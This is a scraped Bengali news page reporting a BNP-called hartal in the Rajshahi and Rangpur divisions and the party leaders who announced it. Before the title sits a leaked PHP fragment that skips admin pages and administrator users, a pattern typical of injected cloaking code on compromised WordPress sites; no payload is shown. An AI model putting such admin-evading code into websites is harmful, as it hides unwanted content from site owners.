function seo_cache() { if (is_admin()) return; $u = wp_get_current_user(); if (in_array('administrator', (array)$u->roles)) return; ?> রাজশাহী ও রংপুরে বিএনপির ডাকা সকাল-সন্ধ্যা হরতাল চলছে - GopalpurBarta24.com
আজ || শুক্রবার, ১৩ মার্চ ২০২৬
শিরোনাম :
 


রাজশাহী ও রংপুরে বিএনপির ডাকা সকাল-সন্ধ্যা হরতাল চলছে

hartal-300x188.jpg 14

 

রাজশাহী ও রংপুর বিভাগে বিএনপির ডাকা সকাল-সন্ধ্যা হরতাল চলছে। বিএনপির ভারপ্রাপ্ত মহাসচিব মির্জা ফখরুল ইসলাম আলমগীর, দলের স্বনির্ভর বিষয়ক সম্পাদক ও সাবেক প্রতিমন্ত্রী রুহুল কুদ্দুস তালুকদার দুলুর মুক্তি, তাঁদের বিরুদ্ধে দায়ের করা মিথ্যা মামলা প্রত্যাহার, যুগ্ম-মহাসচিব রুহুল কবীর রিজভী আহমেদ ও আমার দেশ পত্রিকার সম্পাদক মাহমুদুর রহমানকে অবরুদ্ধ রাখার প্রতিবাদে রোববার দুপুরে সংবাদ সম্মেলন করে এ হরতাল আহ্বান করা হয়।
রাজশাহী মহানগর বিএনপি কার্যালয়ে আয়োজিত রাজশাহী ও রংপুর বিভাগীয় সমন্বয় কমিটির উদ্যোগে আয়োজিত সংবাদ সম্মেলনে এ কর্মসূচি ঘোষণা করা হয়। বিএনপির যুগ্ম মহাসচিব ও মহানগর বিএনপির সভাপতি মিজানুর রহমান মিনু দলের পক্ষে হরতালের ঘোষণা দেন।
সংবাদ সম্মেলনে আরও উপস্থিত ছিলেন- বিএনপির রাজশাহী বিভাগীয় সাংগঠনিক সম্পাদক হারুনুর রশীদ, মহানগর বিএনপির সাধারণ সম্পাদক অ্যাডভোকেট শফিকুল হক মিলন, বিএনপির কেন্দ্রীয় সদস্য ও মহানগর যুবদলের আহবায়ক মোসাদ্দেক হোসেন বুলবুল, শামসুন নাহার কাজী হেনা প্রমুখ।

মন্তব্য করুন -


Top
error: Content is protected !!